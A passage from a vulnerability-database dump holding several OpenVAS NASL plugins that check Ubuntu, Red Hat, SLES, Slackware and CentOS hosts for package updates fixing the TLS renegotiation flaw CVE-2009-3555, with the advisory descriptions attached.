gb_ubuntu_USN_927_1.nasl 8447 2018-01-17 16:12:19Z teissa $\n#\n# Ubuntu Update for nss vulnerability USN-927-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds support for the new\n new renegotiation extension and will use it when the server supports it.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-927-1\";\ntag_affected = \"nss vulnerability on Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-927-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840416\");\n script_version(\"$Revision: 8447 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:12:19 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 17:02:11 +0200 (Fri, 16 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"927-1\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Ubuntu Update for nss vulnerability USN-927-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d-dbg\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-dev\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-0d\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-tools\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:42", "bulletinFamily": "scanner", "description": "Check for the Version of nss", "modified": "2017-12-21T00:00:00", "published": "2010-03-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870238", "id": "OPENVAS:870238", "title": "RedHat Update for nss RHSA-2010:0165-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for nss RHSA-2010:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491 \n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\n\ntag_affected = \"nss on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-March/msg00023.html\");\n script_id(870238);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0165-01\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"RedHat Update for nss RHSA-2010:0165-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:10", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n compat-openssl097g\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-11-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66278", "id": "OPENVAS:66278", "title": "SLES10: Security update for OpenSSL", "type": "openvas", "sourceData": "#\n#VID slesp2-compat-openssl097g-6656\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n compat-openssl097g\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(66278);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES10: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~13.19.1\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:05", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-320-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66270", "id": "OPENVAS:66270", "title": "Slackware Advisory SSA:2009-320-01 openssl ", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_320_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New openssl packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\nand -current to fix a security issue.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-320-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-320-01\";\n \nif(description)\n{\n script_id(66270);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n script_name(\"Slackware Advisory SSA:2009-320-01 openssl \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.8h-i486-4_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.8h-i486-4_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.8h-i486-4_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.8h-i486-4_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.8h-i486-4_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.8h-i486-4_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.8i-i486-4_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.8i-i486-4_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.8k-i486-3_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.8k-i486-3_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-19T15:04:46", "bulletinFamily": "scanner", "description": "Check for the Version of nss", "modified": "2018-01-18T00:00:00", "published": "2010-03-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870238", "id": "OPENVAS:1361412562310870238", "type": "openvas", "title": "RedHat Update for nss RHSA-2010:0165-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for nss RHSA-2010:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491 \n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\n\ntag_affected = \"nss on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-March/msg00023.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870238\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0165-01\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"RedHat Update for nss RHSA-2010:0165-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:45", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880611", "title": "CentOS Update for nspr CESA-2010:0165 centos5 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for nspr CESA-2010:0165 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.880611\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2010:0165\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"CentOS Update for nspr CESA-2010:0165 centos5 i386\");\n\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-March/016602.html\");\n script_xref(name:\"URL\", value:\"http://kbase.redhat.com/faq/docs/DOC-20491\");\n script_xref(name:\"URL\", value:\"http://kbase.redhat.com/faq/docs/DOC-28439\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nspr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", 